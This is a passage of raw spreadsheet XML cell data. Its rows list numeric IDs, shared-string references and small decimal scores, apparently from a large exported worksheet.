      <c r="A32373" s="1">
        <v>16448.0</v>
      </c>
      <c r="B32373" s="2">
        <v>4.6416079E7</v>
      </c>
      <c r="C32373" s="2" t="s">
        <v>31154</v>
      </c>
      <c r="D32373" s="2">
        <v>1.0</v>
      </c>
      <c r="E32373" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32373" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32374" ht="15.75" customHeight="1">
      <c r="A32374" s="1">
        <v>16480.0</v>
      </c>
      <c r="B32374" s="2">
        <v>4.6521411E7</v>
      </c>
      <c r="C32374" s="2" t="s">
        <v>31155</v>
      </c>
      <c r="D32374" s="2">
        <v>1.0</v>
      </c>
      <c r="E32374" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32374" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32375" ht="15.75" customHeight="1">
      <c r="A32375" s="1">
        <v>16493.0</v>
      </c>
      <c r="B32375" s="2">
        <v>4.655647E7</v>
      </c>
      <c r="C32375" s="2" t="s">
        <v>31156</v>
      </c>
      <c r="D32375" s="2">
        <v>1.0</v>
      </c>
      <c r="E32375" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32375" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32376" ht="15.75" customHeight="1">
      <c r="A32376" s="1">
        <v>16679.0</v>
      </c>
      <c r="B32376" s="2">
        <v>4.7293097E7</v>
      </c>
      <c r="C32376" s="2" t="s">
        <v>31157</v>
      </c>
      <c r="D32376" s="2">
        <v>1.0</v>
      </c>
      <c r="E32376" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32376" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32377" ht="15.75" customHeight="1">
      <c r="A32377" s="1">
        <v>16774.0</v>
      </c>
      <c r="B32377" s="2">
        <v>4769376.0</v>
      </c>
      <c r="C32377" s="2" t="s">
        <v>31158</v>
      </c>
      <c r="D32377" s="2">
        <v>1.0</v>
      </c>
      <c r="E32377" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32377" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32378" ht="15.75" customHeight="1">
      <c r="A32378" s="1">
        <v>16810.0</v>
      </c>
      <c r="B32378" s="2">
        <v>4.781841E7</v>
      </c>
      <c r="C32378" s="2" t="s">
        <v>31159</v>
      </c>
      <c r="D32378" s="2">
        <v>1.0</v>
      </c>
      <c r="E32378" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32378" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32379" ht="15.75" customHeight="1">
      <c r="A32379" s="1">
        <v>16925.0</v>
      </c>
      <c r="B32379" s="2">
        <v>4.8149363E7</v>
      </c>
      <c r="C32379" s="2" t="s">
        <v>31160</v>
      </c>
      <c r="D32379" s="2">
        <v>1.0</v>
      </c>
      <c r="E32379" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32379" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32380" ht="15.75" customHeight="1">
      <c r="A32380" s="1">
        <v>16929.0</v>
      </c>
      <c r="B32380" s="2">
        <v>4.8159925E7</v>
      </c>
      <c r="C32380" s="2" t="s">
        <v>31161</v>
      </c>
      <c r="D32380" s="2">
        <v>1.0</v>
      </c>
      <c r="E32380" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32380" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32381" ht="15.75" customHeight="1">
      <c r="A32381" s="1">
        <v>17023.0</v>
      </c>
      <c r="B32381" s="2">
        <v>4.8458436E7</v>
      </c>
      <c r="C32381" s="2" t="s">
        <v>31162</v>
      </c>
      <c r="D32381" s="2">
        <v>1.0</v>
      </c>
      <c r="E32381" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32381" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32382" ht="15.75" customHeight="1">
      <c r="A32382" s="1">
        <v>17285.0</v>
      </c>
      <c r="B32382" s="2">
        <v>4.9213059E7</v>
      </c>
      <c r="C32382" s="2" t="s">
        <v>31163</v>
      </c>
      <c r="D32382" s="2">
        <v>1.0</v>
      </c>
      <c r="E32382" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32382" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32383" ht="15.75" customHeight="1">
      <c r="A32383" s="1">
        <v>17530.0</v>
      </c>
      <c r="B32383" s="2">
        <v>5.0106567E7</v>
      </c>
      <c r="C32383" s="2" t="s">
        <v>31164</v>
      </c>
      <c r="D32383" s="2">
        <v>1.0</v>
      </c>
      <c r="E32383" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32383" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32384" ht="15.75" customHeight="1">
      <c r="A32384" s="1">
        <v>17661.0</v>
      </c>
      <c r="B32384" s="2">
        <v>5.0441437E7</v>
      </c>
      <c r="C32384" s="2" t="s">
        <v>31165</v>
      </c>
      <c r="D32384" s="2">
        <v>1.0</v>
      </c>
      <c r="E32384" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32384" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32385" ht="15.75" customHeight="1">
      <c r="A32385" s="1">
        <v>17673.0</v>
      </c>
      <c r="B32385" s="2">
        <v>5.048974E7</v>
      </c>
      <c r="C32385" s="2" t="s">
        <v>31166</v>
      </c>
      <c r="D32385" s="2">
        <v>1.0</v>
      </c>
      <c r="E32385" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32385" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32386" ht="15.75" customHeight="1">
      <c r="A32386" s="1">
        <v>17851.0</v>
      </c>
      <c r="B32386" s="2">
        <v>5.0984021E7</v>
      </c>
      <c r="C32386" s="2" t="s">
        <v>31167</v>
      </c>
      <c r="D32386" s="2">
        <v>1.0</v>
      </c>
      <c r="E32386" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32386" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32387" ht="15.75" customHeight="1">
      <c r="A32387" s="1">
        <v>17864.0</v>
      </c>
      <c r="B32387" s="2">
        <v>5.1012534E7</v>
      </c>
      <c r="C32387" s="2" t="s">
        <v>31168</v>
      </c>
      <c r="D32387" s="2">
        <v>1.0</v>
      </c>
      <c r="E32387" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32387" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32388" ht="15.75" customHeight="1">
      <c r="A32388" s="1">
        <v>17982.0</v>
      </c>
      <c r="B32388" s="2">
        <v>5.1381785E7</v>
      </c>
      <c r="C32388" s="2" t="s">
        <v>31169</v>
      </c>
      <c r="D32388" s="2">
        <v>1.0</v>
      </c>
      <c r="E32388" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32388" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32389" ht="15.75" customHeight="1">
      <c r="A32389" s="1">
        <v>18068.0</v>
      </c>
      <c r="B32389" s="2">
        <v>5.1608807E7</v>
      </c>
      <c r="C32389" s="2" t="s">
        <v>31170</v>
      </c>
      <c r="D32389" s="2">
        <v>1.0</v>
      </c>
      <c r="E32389" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32389" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32390" ht="15.75" customHeight="1">
      <c r="A32390" s="1">
        <v>18216.0</v>
      </c>
      <c r="B32390" s="2">
        <v>5.2079926E7</v>
      </c>
      <c r="C32390" s="2" t="s">
        <v>31171</v>
      </c>
      <c r="D32390" s="2">
        <v>1.0</v>
      </c>
      <c r="E32390" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32390" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32391" ht="15.75" customHeight="1">
      <c r="A32391" s="1">
        <v>18537.0</v>
      </c>
      <c r="B32391" s="2">
        <v>5.3112106E7</v>
      </c>
      <c r="C32391" s="2" t="s">
        <v>31172</v>
      </c>
      <c r="D32391" s="2">
        <v>1.0</v>
      </c>
      <c r="E32391" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32391" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32392" ht="15.75" customHeight="1">
      <c r="A32392" s="1">
        <v>18542.0</v>
      </c>
      <c r="B32392" s="2">
        <v>5.3119258E7</v>
      </c>
      <c r="C32392" s="2" t="s">
        <v>31173</v>
      </c>
      <c r="D32392" s="2">
        <v>1.0</v>
      </c>
      <c r="E32392" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32392" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32393" ht="15.75" customHeight="1">
      <c r="A32393" s="1">
        <v>18650.0</v>
      </c>
      <c r="B32393" s="2">
        <v>5.3466944E7</v>
      </c>
      <c r="C32393" s="2" t="s">
        <v>31174</v>
      </c>
      <c r="D32393" s="2">
        <v>1.0</v>
      </c>
      <c r="E32393" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32393" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32394" ht="15.75" customHeight="1">
      <c r="A32394" s="1">
        <v>18781.0</v>
      </c>
      <c r="B32394" s="2">
        <v>5.3819429E7</v>
      </c>
      <c r="C32394" s="2" t="s">
        <v>31175</v>
      </c>
      <c r="D32394" s="2">
        <v>1.0</v>
      </c>
      <c r="E32394" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32394" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32395" ht="15.75" customHeight="1">
      <c r="A32395" s="1">
        <v>18798.0</v>
      </c>
      <c r="B32395" s="2">
        <v>5.3850518E7</v>
      </c>
      <c r="C32395" s="2" t="s">
        <v>31176</v>
      </c>
      <c r="D32395" s="2">
        <v>1.0</v>
      </c>
      <c r="E32395" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32395" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32396" ht="15.75" customHeight="1">
      <c r="A32396" s="1">
        <v>19120.0</v>
      </c>
      <c r="B32396" s="2">
        <v>5.4753943E7</v>
      </c>
      <c r="C32396" s="2" t="s">
        <v>31177</v>
      </c>
      <c r="D32396" s="2">
        <v>1.0</v>
      </c>
      <c r="E32396" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32396" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32397" ht="15.75" customHeight="1">
      <c r="A32397" s="1">
        <v>19180.0</v>
      </c>
      <c r="B32397" s="2">
        <v>5.4972328E7</v>
      </c>
      <c r="C32397" s="2" t="s">
        <v>31178</v>
      </c>
      <c r="D32397" s="2">
        <v>1.0</v>
      </c>
      <c r="E32397" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32397" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32398" ht="15.75" customHeight="1">
      <c r="A32398" s="1">
        <v>19468.0</v>
      </c>
      <c r="B32398" s="2">
        <v>5.5819207E7</v>
      </c>
      <c r="C32398" s="2" t="s">
        <v>31179</v>
      </c>
      <c r="D32398" s="2">
        <v>1.0</v>
      </c>
      <c r="E32398" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32398" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32399" ht="15.75" customHeight="1">
      <c r="A32399" s="1">
        <v>19505.0</v>
      </c>
      <c r="B32399" s="2">
        <v>5.5916134E7</v>
      </c>
      <c r="C32399" s="2" t="s">
        <v>31180</v>
      </c>
      <c r="D32399" s="2">
        <v>1.0</v>
      </c>
      <c r="E32399" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32399" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32400" ht="15.75" customHeight="1">
      <c r="A32400" s="1">
        <v>19700.0</v>
      </c>
      <c r="B32400" s="2">
        <v>5.6494143E7</v>
      </c>
      <c r="C32400" s="2" t="s">
        <v>31181</v>
      </c>
      <c r="D32400" s="2">
        <v>1.0</v>
      </c>
      <c r="E32400" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32400" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32401" ht="15.75" customHeight="1">
      <c r="A32401" s="1">
        <v>19784.0</v>
      </c>
      <c r="B32401" s="2">
        <v>5.6805485E7</v>
      </c>
      <c r="C32401" s="2" t="s">
        <v>31182</v>
      </c>
      <c r="D32401" s="2">
        <v>1.0</v>
      </c>
      <c r="E32401" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32401" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32402" ht="15.75" customHeight="1">
      <c r="A32402" s="1">
        <v>19949.0</v>
      </c>
      <c r="B32402" s="2">
        <v>5.7495651E7</v>
      </c>
      <c r="C32402" s="2" t="s">
        <v>31183</v>
      </c>
      <c r="D32402" s="2">
        <v>1.0</v>
      </c>
      <c r="E32402" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32402" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32403" ht="15.75" customHeight="1">
      <c r="A32403" s="1">
        <v>20003.0</v>
      </c>
      <c r="B32403" s="2">
        <v>5.7721303E7</v>
      </c>
      <c r="C32403" s="2" t="s">
        <v>31184</v>
      </c>
      <c r="D32403" s="2">
        <v>1.0</v>
      </c>
      <c r="E32403" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32403" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32404" ht="15.75" customHeight="1">
      <c r="A32404" s="1">
        <v>20251.0</v>
      </c>
      <c r="B32404" s="2">
        <v>1.0955641E7</v>
      </c>
      <c r="C32404" s="2" t="s">
        <v>31185</v>
      </c>
      <c r="D32404" s="2">
        <v>1.0</v>
      </c>
      <c r="E32404" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32404" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32405" ht="15.75" customHeight="1">
      <c r="A32405" s="1">
        <v>20314.0</v>
      </c>
      <c r="B32405" s="2">
        <v>1.1421928E7</v>
      </c>
      <c r="C32405" s="2" t="s">
        <v>31186</v>
      </c>
      <c r="D32405" s="2">
        <v>1.0</v>
      </c>
      <c r="E32405" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32405" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32406" ht="15.75" customHeight="1">
      <c r="A32406" s="1">
        <v>20369.0</v>
      </c>
      <c r="B32406" s="2">
        <v>1.1815342E7</v>
      </c>
      <c r="C32406" s="2" t="s">
        <v>31187</v>
      </c>
      <c r="D32406" s="2">
        <v>1.0</v>
      </c>
      <c r="E32406" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32406" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32407" ht="15.75" customHeight="1">
      <c r="A32407" s="1">
        <v>21485.0</v>
      </c>
      <c r="B32407" s="2">
        <v>2.3042932E7</v>
      </c>
      <c r="C32407" s="2" t="s">
        <v>31188</v>
      </c>
      <c r="D32407" s="2">
        <v>1.0</v>
      </c>
      <c r="E32407" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32407" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32408" ht="15.75" customHeight="1">
      <c r="A32408" s="1">
        <v>21512.0</v>
      </c>
      <c r="B32408" s="2">
        <v>2.3153616E7</v>
      </c>
      <c r="C32408" s="2" t="s">
        <v>31189</v>
      </c>
      <c r="D32408" s="2">
        <v>1.0</v>
      </c>
      <c r="E32408" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32408" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32409" ht="15.75" customHeight="1">
      <c r="A32409" s="1">
        <v>23513.0</v>
      </c>
      <c r="B32409" s="2">
        <v>5828065.0</v>
      </c>
      <c r="C32409" s="2" t="s">
        <v>31190</v>
      </c>
      <c r="D32409" s="2">
        <v>1.0</v>
      </c>
      <c r="E32409" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32409" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32410" ht="15.75" customHeight="1">
      <c r="A32410" s="1">
        <v>23847.0</v>
      </c>
      <c r="B32410" s="2">
        <v>8195525.0</v>
      </c>
      <c r="C32410" s="2" t="s">
        <v>31191</v>
      </c>
      <c r="D32410" s="2">
        <v>1.0</v>
      </c>
      <c r="E32410" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32410" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32411" ht="15.75" customHeight="1">
      <c r="A32411" s="1">
        <v>24092.0</v>
      </c>
      <c r="B32411" s="2">
        <v>9779016.0</v>
      </c>
      <c r="C32411" s="2" t="s">
        <v>31192</v>
      </c>
      <c r="D32411" s="2">
        <v>1.0</v>
      </c>
      <c r="E32411" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32411" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32412" ht="15.75" customHeight="1">
      <c r="A32412" s="1">
        <v>24111.0</v>
      </c>
      <c r="B32412" s="2">
        <v>9883405.0</v>
      </c>
      <c r="C32412" s="2" t="s">
        <v>31193</v>
      </c>
      <c r="D32412" s="2">
        <v>1.0</v>
      </c>
      <c r="E32412" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32412" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32413" ht="15.75" customHeight="1">
      <c r="A32413" s="1">
        <v>24284.0</v>
      </c>
      <c r="B32413" s="2">
        <v>1.0550809E7</v>
      </c>
      <c r="C32413" s="2" t="s">
        <v>31194</v>
      </c>
      <c r="D32413" s="2">
        <v>1.0</v>
      </c>
      <c r="E32413" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32413" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32414" ht="15.75" customHeight="1">
      <c r="A32414" s="1">
        <v>24601.0</v>
      </c>
      <c r="B32414" s="2">
        <v>1.1421927E7</v>
      </c>
      <c r="C32414" s="2" t="s">
        <v>31186</v>
      </c>
      <c r="D32414" s="2">
        <v>1.0</v>
      </c>
      <c r="E32414" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32414" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32415" ht="15.75" customHeight="1">
      <c r="A32415" s="1">
        <v>24900.0</v>
      </c>
      <c r="B32415" s="2">
        <v>1.2308331E7</v>
      </c>
      <c r="C32415" s="2" t="s">
        <v>31195</v>
      </c>
      <c r="D32415" s="2">
        <v>1.0</v>
      </c>
      <c r="E32415" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32415" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32416" ht="15.75" customHeight="1">
      <c r="A32416" s="1">
        <v>25931.0</v>
      </c>
      <c r="B32416" s="2">
        <v>1.5186025E7</v>
      </c>
      <c r="C32416" s="2" t="s">
        <v>31196</v>
      </c>
      <c r="D32416" s="2">
        <v>1.0</v>
      </c>
      <c r="E32416" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32416" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32417" ht="15.75" customHeight="1">
      <c r="A32417" s="1">
        <v>26835.0</v>
      </c>
      <c r="B32417" s="2">
        <v>1.8878074E7</v>
      </c>
      <c r="C32417" s="2" t="s">
        <v>31197</v>
      </c>
      <c r="D32417" s="2">
        <v>1.0</v>
      </c>
      <c r="E32417" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32417" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32418" ht="15.75" customHeight="1">
      <c r="A32418" s="1">
        <v>26836.0</v>
      </c>
      <c r="B32418" s="2">
        <v>1.8910117E7</v>
      </c>
      <c r="C32418" s="2" t="s">
        <v>31198</v>
      </c>
      <c r="D32418" s="2">
        <v>1.0</v>
      </c>
      <c r="E32418" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32418" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32419" ht="15.75" customHeight="1">
      <c r="A32419" s="1">
        <v>26898.0</v>
      </c>
      <c r="B32419" s="2">
        <v>1.9283007E7</v>
      </c>
      <c r="C32419" s="2" t="s">
        <v>31199</v>
      </c>
      <c r="D32419" s="2">
        <v>1.0</v>
      </c>
      <c r="E32419" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32419" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32420" ht="15.75" customHeight="1">
      <c r="A32420" s="1">
        <v>26943.0</v>
      </c>
      <c r="B32420" s="2">
        <v>1.9558815E7</v>
      </c>
      <c r="C32420" s="2" t="s">
        <v>31200</v>
      </c>
      <c r="D32420" s="2">
        <v>1.0</v>
      </c>
      <c r="E32420" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32420" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32421" ht="15.75" customHeight="1">
      <c r="A32421" s="1">
        <v>27025.0</v>
      </c>
      <c r="B32421" s="2">
        <v>2.0036703E7</v>
      </c>
      <c r="C32421" s="2" t="s">
        <v>31201</v>
      </c>
      <c r="D32421" s="2">
        <v>1.0</v>
      </c>
      <c r="E32421" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32421" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32422" ht="15.75" customHeight="1">
      <c r="A32422" s="1">
        <v>27711.0</v>
      </c>
      <c r="B32422" s="2">
        <v>2.305449E7</v>
      </c>
      <c r="C32422" s="2" t="s">
        <v>31202</v>
      </c>
      <c r="D32422" s="2">
        <v>1.0</v>
      </c>
      <c r="E32422" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32422" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32423" ht="15.75" customHeight="1">
      <c r="A32423" s="1">
        <v>27796.0</v>
      </c>
      <c r="B32423" s="2">
        <v>2.3153615E7</v>
      </c>
      <c r="C32423" s="2" t="s">
        <v>31189</v>
      </c>
      <c r="D32423" s="2">
        <v>1.0</v>
      </c>
      <c r="E32423" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32423" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32424" ht="15.75" customHeight="1">
      <c r="A32424" s="1">
        <v>28011.0</v>
      </c>
      <c r="B32424" s="2">
        <v>2.4340949E7</v>
      </c>
      <c r="C32424" s="2" t="s">
        <v>31203</v>
      </c>
      <c r="D32424" s="2">
        <v>1.0</v>
      </c>
      <c r="E32424" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32424" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32425" ht="15.75" customHeight="1">
      <c r="A32425" s="1">
        <v>28807.0</v>
      </c>
      <c r="B32425" s="2">
        <v>2.8660818E7</v>
      </c>
      <c r="C32425" s="2" t="s">
        <v>31204</v>
      </c>
      <c r="D32425" s="2">
        <v>1.0</v>
      </c>
      <c r="E32425" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32425" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32426" ht="15.75" customHeight="1">
      <c r="A32426" s="1">
        <v>29593.0</v>
      </c>
      <c r="B32426" s="2">
        <v>3.3532919E7</v>
      </c>
      <c r="C32426" s="2" t="s">
        <v>31205</v>
      </c>
      <c r="D32426" s="2">
        <v>1.0</v>
      </c>
      <c r="E32426" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32426" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32427" ht="15.75" customHeight="1">
      <c r="A32427" s="1">
        <v>29655.0</v>
      </c>
      <c r="B32427" s="2">
        <v>3.3874679E7</v>
      </c>
      <c r="C32427" s="2" t="s">
        <v>31206</v>
      </c>
      <c r="D32427" s="2">
        <v>1.0</v>
      </c>
      <c r="E32427" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32427" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32428" ht="15.75" customHeight="1">
      <c r="A32428" s="1">
        <v>29730.0</v>
      </c>
      <c r="B32428" s="2">
        <v>3.456165E7</v>
      </c>
      <c r="C32428" s="2" t="s">
        <v>31207</v>
      </c>
      <c r="D32428" s="2">
        <v>1.0</v>
      </c>
      <c r="E32428" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32428" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32429" ht="15.75" customHeight="1">
      <c r="A32429" s="1">
        <v>30624.0</v>
      </c>
      <c r="B32429" s="2">
        <v>4.1359793E7</v>
      </c>
      <c r="C32429" s="2" t="s">
        <v>31208</v>
      </c>
      <c r="D32429" s="2">
        <v>1.0</v>
      </c>
      <c r="E32429" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32429" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32430" ht="15.75" customHeight="1">
      <c r="A32430" s="1">
        <v>32517.0</v>
      </c>
      <c r="B32430" s="2">
        <v>5717722.0</v>
      </c>
      <c r="C32430" s="2" t="s">
        <v>30971</v>
      </c>
      <c r="D32430" s="2">
        <v>1.0</v>
      </c>
      <c r="E32430" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32430" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32431" ht="15.75" customHeight="1">
      <c r="A32431" s="1">
        <v>32597.0</v>
      </c>
      <c r="B32431" s="2">
        <v>5806514.0</v>
      </c>
      <c r="C32431" s="2" t="s">
        <v>31209</v>
      </c>
      <c r="D32431" s="2">
        <v>1.0</v>
      </c>
      <c r="E32431" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32431" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32432" ht="15.75" customHeight="1">
      <c r="A32432" s="1">
        <v>32951.0</v>
      </c>
      <c r="B32432" s="2">
        <v>6489156.0</v>
      </c>
      <c r="C32432" s="2" t="s">
        <v>31210</v>
      </c>
      <c r="D32432" s="2">
        <v>1.0</v>
      </c>
      <c r="E32432" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32432" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32433" ht="15.75" customHeight="1">
      <c r="A32433" s="1">
        <v>33447.0</v>
      </c>
      <c r="B32433" s="2">
        <v>7862764.0</v>
      </c>
      <c r="C32433" s="2" t="s">
        <v>31211</v>
      </c>
      <c r="D32433" s="2">
        <v>1.0</v>
      </c>
      <c r="E32433" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32433" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32434" ht="15.75" customHeight="1">
      <c r="A32434" s="1">
        <v>33555.0</v>
      </c>
      <c r="B32434" s="2">
        <v>8195524.0</v>
      </c>
      <c r="C32434" s="2" t="s">
        <v>31191</v>
      </c>
      <c r="D32434" s="2">
        <v>1.0</v>
      </c>
      <c r="E32434" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32434" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32435" ht="15.75" customHeight="1">
      <c r="A32435" s="1">
        <v>33645.0</v>
      </c>
      <c r="B32435" s="2">
        <v>8397312.0</v>
      </c>
      <c r="C32435" s="5" t="s">
        <v>31212</v>
      </c>
      <c r="D32435" s="2">
        <v>1.0</v>
      </c>
      <c r="E32435" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32435" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32436" ht="15.75" customHeight="1">
      <c r="A32436" s="1">
        <v>34128.0</v>
      </c>
      <c r="B32436" s="2">
        <v>9779015.0</v>
      </c>
      <c r="C32436" s="2" t="s">
        <v>31213</v>
      </c>
      <c r="D32436" s="2">
        <v>1.0</v>
      </c>
      <c r="E32436" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32436" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32437" ht="15.75" customHeight="1">
      <c r="A32437" s="1">
        <v>3826.0</v>
      </c>
      <c r="B32437" s="2">
        <v>4.014143E7</v>
      </c>
      <c r="C32437" s="2" t="s">
        <v>31214</v>
      </c>
      <c r="D32437" s="2">
        <v>1.0</v>
      </c>
      <c r="E32437" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32437" s="2">
        <v>0.09927140255009106</v>
      </c>
    </row>
    <row r="32438" ht="15.75" customHeight="1">
      <c r="A32438" s="1">
        <v>921.0</v>
      </c>
      <c r="B32438" s="2">
        <v>2.228511E7</v>
      </c>
      <c r="C32438" s="2" t="s">
        <v>31215</v>
      </c>
      <c r="D32438" s="2">
        <v>1.0</v>
      </c>
      <c r="E32438" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32438" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="32439" ht="15.75" customHeight="1">
      <c r="A32439" s="1">
        <v>2134.0</v>
      </c>
      <c r="B32439" s="2">
        <v>3.1508769E7</v>
      </c>
      <c r="C32439" s="2" t="s">
        <v>31216</v>
      </c>
      <c r="D32439" s="2">
        <v>1.0</v>
      </c>
      <c r="E32439" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32439" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="32440" ht="15.75" customHeight="1">
      <c r="A32440" s="1">
